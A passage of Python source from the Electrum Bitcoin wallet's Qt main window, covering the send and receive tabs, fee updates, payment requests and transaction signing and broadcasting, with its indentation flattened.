if(v > 0):
self.notify(_("New transaction received: %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
if self.fee_unit == 0:
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
else:
return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mBTC'
if self.decimal_point == 8:
return 'BTC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
_('and you will have the possiblity, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(False)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.fee_e, 5, 2)
grid.addWidget(self.rbf_checkbox, 5, 3)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is None:
return
rbf_policy = self.config.get('rbf_policy', 1)
if rbf_policy == 0:
b = True
elif rbf_policy == 1:
fee_rate = fee * 1000 / tx.estimated_size()
try:
c = self.config.reverse_dynfee(fee_rate)
b = c in [-1, 25]
except:
b = False
elif rbf_policy == 2:
b = False
self.rbf_checkbox.setVisible(b)
self.rbf_checkbox.setChecked(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.rbf_checkbox.isChecked()
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
